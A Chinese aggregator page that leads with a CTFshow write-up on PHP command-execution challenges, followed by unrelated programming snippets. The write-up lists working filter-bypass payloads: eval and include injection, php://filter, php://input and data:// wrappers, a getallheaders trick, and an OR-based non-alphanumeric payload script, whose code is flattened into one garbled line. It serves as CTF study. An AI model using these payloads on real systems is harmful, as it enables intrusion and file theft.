当前位置：首页 > news >正文

ctfshow-命令执行

news 2025/12/16 7:25:24

大佬文章

$\rm Linux$ 下空格绕过

无参数 $\rm rce$

无字符 $\rm rce$

web29

通配符：

*：匹配任意多个字符

?：匹配任意一个字符

[]：匹配某个范围的字符（ $[a d]$ 表示 $a - d$ 的字符）

{a,b}：匹配 $a$ 或者 $b$

web30

echo `cat flag`：表示先运行 cat flag，然后再把结果输出

web31

%09(tab) 绕过空格
命令拼接：c=eval($_POST[a]);，然后 POST 传入一个变量 a 即可
无参数 $\rm rce$

web32

过滤分号，用 ?> 代替
过滤括号，使用 include 函数，其不需要括号传参（例如 include a.php）

因此 ?c=include%09$_POST[a]?> ，之后 post 传入一个文件即可

文件会被注释掉（显示不出来），所以考虑伪协议读文件

a=php://filter/read=convert.base64-encode/resource=flag.php

web37

使用 php://input 协议，之后 post 传入需要的 php 代码即可

web38

data 伪协议读文件

c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg== ( $\rm base64$ 是 system("cat flag");)

web39

同web38

web40

无参数命令执行

getallheaders() 将 http 头中的信息放到一个数组里面

修改http 头中的某些不重要的内容为 system("cat flag")，使用语句 eval(array_rand(array_flip(getallheaders())));，多刷新几次即可做到无参数命令执行

web41

无数字字母 $\rm rce$

一般实现方法是自增，取反，异或，或

这题用的是或运算

# coding=gbk
import re
import requests
use = []
def get_and(aim, use):ans1 = ""ans2 = ""for i in range(len(aim)):ok = Falsefor j in range(len(use)):for k in range(j,len(use)):if (ord(use[j]) | ord(use[k])) == ord(aim[i]):ans1 = ans1 + use[j]ans2 = ans2 + use[k]ok = Trueif ok: breakif ok: break            ans = ""for i in range(len(ans1)): ans += chr(ord(ans1[i]) | ord(ans2[i]))    print(ans)return "(\""+ans1+"\"|\""+ans2+"\")"if __name__ == '__main__':match_str = "/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-"url = "http://e5280b73-c2cb-4f3f-9309-68319256efdf.challenge.ctf.show/"for i in range(256):c = chr(i)tmp = re.match(match_str, c, re.I)if tmp == None:use.append(c)func = "system"argu = "cat flag.php"data = {"c":get_and(func,use)+get_and(argu,use)}print(data)r = requests.post(url = url, data = data)print(r.text)

web42

system($c." >/dev/null 2>&1"); 黑洞代码

cat flag && ls：只会让后面的查询没有
ls #：# 是 shell 脚本的注释

web46

flag 被过滤，可以换成 f''lag

未完待续

ctfshow-命令执行

大佬文章 L i n u x \rm Linux Linux 下空格绕过无参数 r c e \rm rce rce 无字符 r c e \rm rce rce web29 通配符： *：匹配任意多个字符 ?：匹配任意一个字符 []：匹配某个范围的字符（ [ a d ] [ad] [ad] 表示 …...

编程日记 2024/1/27 0:24:30

【Python基础015】集合的用法

1、定义集合是无序可变，元素不能重复。实际上，集合底层是字典实现，集合的所有元素都是字典中的 “ 键对象”，因此是不能重复的且唯一的。 2、创建 （1）使用{}创建 a {1, 2, 3} # 集合存储整数b {1, 2,…...

编程日记 2024/1/27 0:22:28

解密神经网络：深入探究传播机制与学习过程

解密神经网络：深入探究传播机制与学习过程文章目录解密神经网络：深入探究传播机制与学习过程一、引言二、基础理论1. 人工神经元：构建块的定义2. 神经网络的结构3. 激活函数的作用三、前向传播1. 数据流动：输入到输出2. 加权和…...

编程日记 2024/1/27 0:21:26

linux usb设备网络共享 usb/ip

USB设备的网络共享可以通过USB/IP来实现， USB/IP把USB I/O信息封装成TCP/IP格式在网络端传输 ，可以实现usb的全部功能，且跨平台，是个透明的设备共享机制。一、服务端 $sudo modprobe usbip-core$sudo modprobe usbip_host$usbip…...

编程日记 2024/1/27 0:20:25

如何通过系统命令排查账号安全？

如何通过系统命令排查账号安全 query user 查看当前登录账号 logoff id 注销用户id net user 查看用户 net user username 查看用户登录情况 lusrmgr.msc 查看隐藏账号 winR打开regedit注册表找到计算机\HEKY_LOCAL_MACHINE\SAM\SAM\右键给与用户读写权限刷新打开 HKEY…...

编程日记 2024/1/27 0:19:24

《WebKit 技术内幕》学习之九（3）： JavaScript引擎

3　JavaScriptCore引擎 3.1　原理 JavaScriptCore引擎是WebKit中的默认JavaScript引擎，也是苹果在开源WebKit项目之后，开源的另外一个重要的项目。同其他很多引擎一样，在刚开始的时候它的主要部分是一个基于抽象语法树的解释器，这…...

编程日记 2024/1/27 0:18:24

IS-IS：05 ISIS开销值和协议优先级

IS-IS 协议为路由器的每个 IS-IS 接口定义并维护了一个 level-1 开销值和一个 level-2开销值。开销值可以在接口上或者全局上手动配置，也可以使用 auto-cost自动计算确定。修改接口cost： int g0/0/0 isis cost 50修改全局cost： isis cir…...

编程日记 2024/1/27 0:17:23

群辉NAS的远程访问

群辉NAS是私有云存储，局域网访问很容易【详见：网上邻居访问设置、其它设备的访问设置】，远程访问相对复杂，涉及很多关键因素，现将过程记录如下： 目录 1、互联网接入 2、绑定MAC与IP地址 3、路由器开启5…...

编程日记 2024/1/27 0:15:21

构建未来学堂：在线教育系统开发技术实践

在当今数字化时代，在线教育系统的开发越发显得至关重要。本文将带你深入了解在线教育系统的开发，涉及到关键的技术实践和代码示例。我们将采用现代化技术栈，为未来学堂的搭建提供实用的指南。技术栈选择在开始实际的开发之前&#xff0c…...

编程日记 2024/1/27 0:14:20

EMQX 单机及集群搭建

目录 1. 通过 Yum 源安装（CentOS7 单机安装） 1.1. 通过以下命令配置 EMQX Yum 源： 1.2. 运行以下命令安装 EMQX： 1.3. 运行以下命令启动 EMQX： 1.4. 访问 http://192.168.88.130:18083，默认用户名: adm…...

编程日记 2024/1/27 0:13:19

SpringMVC-对静态资源的访问

1.工程中加入静态资源在webapp下创建static文件夹，此文件夹专门放入静态资源 2.使项目可以处理静态资源的请求在SpringMVC配置文件中添加以下语句 1.引入命名空间 xmlns:mvc"http://www.springframework.org/schema/mvc" xsi:schemaLocation“http…...

编程日记 2024/1/27 0:12:18

形参和实参

目录形参（形式参数）： 实参（实际参数）： 形参和实参的区别和联系具体实例: 当我们谈论"形参"和"实参"时，可以用以下类比来解释它们之间的关系： 形参…...

编程日记 2024/1/27 0:07:14

[git] windows系统安装git教程和配置

一、何为Git Git(读音为/gɪt/)是一个开源的分布式版本控制系统，可以有效、高速地处理从很小到非常大的项目版本管理。二、git安装包有2种版本，Git for Windows Setup和Git for Windows Portable(便携版)两个版本都可以。三、Git for Windows Por…...

编程日记 2024/1/27 0:05:13

php的性能要比node.js高很多吗？

在当今的编程世界中，PHP和Node.js是两种广泛使用的服务器端编程语言。虽然它们都用于构建高效的网络应用程序，但关于它们性能的争论一直存在。有些人认为PHP的性能要比Node.js高很多，而另一些人则持相反意见。性能通常指的是计算机程序或系…...

编程日记 2024/1/27 0:03:11

[极客大挑战 2019]BabySQL1

发现union select被过滤了，双写绕过 or、from被过滤 where被过滤在b4bysql中找到flag...

编程日记 2024/1/27 0:01:09

机器视觉在OCR字符检测的应用

在产品质量检测过程中，对于字符、条码等标识信息的识别、读取、检测是非常重要的一部分，比如在食品饮料包装检测中，生产日期、保质期、生产批号、条码等字符信息是产品管理和追溯必不可缺的，因此利用机器视觉技术进行OCR字符采…...

编程日记 2024/1/27 0:00:09

讲清楚浅拷贝和深拷贝

先放出实现浅拷贝和深拷贝的一些方法(直接食用)： 1.浅拷贝： 浅拷贝在拷贝对象的时候，对于对象最外一层实现的是普通的值拷贝，对于对象里面的对象是浅拷贝，只复制地址不复制地址对应的值。 /* 方法1.1：扩…...

编程日记 2024/1/26 23:55:58

[足式机器人]Part2 Dr. CAN学习笔记- 最优控制Optimal Control Ch07

本文仅供学习使用本文参考： B站：DR_CAN Dr. CAN学习笔记 - 最优控制Optimal Control Ch07-1最优控制问题与性能指标 1. 最优控制问题与性能指标2. 动态规划 Dynamic Programming2.1 基本概念2.2 代码详解2.3 简单一维案例 3. 线性二次型调节器&#xff…...

编程日记 2024/1/26 23:53:55

RedisInsight详细安装教程

简介 RedisInsight 是一个直观高效的 Redis GUI 管理工具，它可以对 Redis 的内存、连接数、命中率以及正常运行时间进行监控，并且可以在界面上使用 CLI 和连接的 Redis 进行交互（RedisInsight 内置对 Redis 模块支持）。 RedisIn…...

编程日记 2024/1/26 23:52:54

1. NosuchMethodError org.springframework.beans.factory.support.genericBeanDefinition(xxxxx) 2. ClassNotFoundException: org.springframework.boot.SpringApplication 可能冲突的依赖是： <dependency><groupId>org.springframework.boot</g…...

编程日记 2024/1/26 23:49:51

在软件开发中正确使用MySQL日期时间类型的深度解析

在日常软件开发场景中，时间信息的存储是底层且核心的需求。从金融交易的精确记账时间、用户操作的行为日志，到供应链系统的物流节点时间戳，时间数据的准确性直接决定业务逻辑的可靠性。MySQL作为主流关系型数据库，其日期时间类型的…...

编程新知 2025/10/16 13:22:06

Xshell远程连接Kali（默认 | 私钥）Note版

前言:xshell远程连接，私钥连接和常规默认连接任务一开启ssh服务 service ssh status //查看ssh服务状态 service ssh start //开启ssh服务 update-rc.d ssh enable //开启自启动ssh服务任务二修改配置文件 vi /etc/ssh/ssh_config //第一…...

编程新知 2025/12/12 3:26:16

04-初识css

一、css样式引入 1.1.内部样式 <div style"width: 100px;"></div>1.2.外部样式 1.2.1.外部样式1 <style>.aa {width: 100px;} </style> <div class"aa"></div>1.2.2.外部样式2 <!-- rel内表面引入的是style样…...

编程新知 2025/12/9 4:36:55

使用Spring AI和MCP协议构建图片搜索服务

目录使用Spring AI和MCP协议构建图片搜索服务引言技术栈概览项目架构设计架构图服务端开发 1. 创建Spring Boot项目 2. 实现图片搜索工具 3. 配置传输模式 Stdio模式（本地调用） SSE模式（远程调用） 4. 注册工具提…...

编程新知 2025/12/9 22:44:20

基于IDIG-GAN的小样本电机轴承故障诊断

目录 🔍 核心问题一、IDIG-GAN模型原理 1. 整体架构 2. 核心创新点 (1) 梯度归一化（Gradient Normalization） (2) 判别器梯度间隙正则化（Discriminator Gradient Gap Regularization） (3) 自注意力机制（Self-Attention） 3. 完整损失函数二…...

编程新知 2025/12/12 10:03:57

什么是VR全景技术

VR全景技术，全称为虚拟现实全景技术，是通过计算机图像模拟生成三维空间中的虚拟世界，使用户能够在该虚拟世界中进行全方位、无死角的观察和交互的技术。VR全景技术模拟人在真实空间中的视觉体验，结合图文、3D、音视频等多媒体元素…...

编程新知 2025/12/9 22:20:09

【把数组变成一棵树】有序数组秒变平衡BST，原来可以这么优雅！

【把数组变成一棵树】有序数组秒变平衡BST，原来可以这么优雅！ 🌱 前言：一棵树的浪漫，从数组开始说起程序员的世界里，数组是最常见的基本结构之一，几乎每种语言、每种算法都少不了它。可你有没有想过，一组看似“线性排列”的有序数组，竟然可以**“长”成一棵平衡的二…...

编程新知 2025/8/26 4:33:55

Xcode 16 集成 cocoapods 报错

基于 Xcode 16 新建工程项目，集成 cocoapods 执行 pod init 报错 ### Error RuntimeError - PBXGroup attempted to initialize an object with unknown ISA PBXFileSystemSynchronizedRootGroup from attributes: {"isa">"PBXFileSystemSynchro…...

编程新知 2025/12/10 12:14:06

小智AI+MCP

什么是小智AI和MCP 如果还不清楚的先看往期文章手搓小智AI聊天机器人 MCP 深度解析：AI 的USB接口如何使用小智MCP 1.刷支持mcp的小智固件 2.下载官方MCP的示例代码 Github：https://github.com/78/mcp-calculator 安这个步骤执行其中MCP_ENDPOI…...

编程新知 2025/12/12 11:29:32

如何通过git命令查看项目连接的仓库地址？

要通过 Git 命令查看项目连接的仓库地址，您可以使用以下几种方法： 1. 查看所有远程仓库地址使用 git remote -v 命令，它会显示项目中配置的所有远程仓库及其对应的 URL： git remote -v输出示例： origin https://…...

编程新知 2025/8/11 20:43:04